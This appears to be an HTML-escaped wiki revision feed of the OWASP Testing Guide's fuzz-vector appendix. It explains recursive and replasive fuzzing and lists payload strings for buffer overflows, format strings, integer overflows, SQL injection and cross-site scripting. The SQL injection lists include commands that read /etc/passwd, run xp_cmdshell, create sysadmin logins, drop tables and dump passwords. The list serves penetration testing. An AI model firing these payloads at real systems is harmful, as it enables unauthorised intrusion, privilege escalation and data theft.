&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13690</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13690"/>
				<updated>2006-11-26T10:05:09Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Passive SQL Injection (SQP) */ fixed nowiki tag&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/00000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/11000fff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/ffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.owasp.org/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
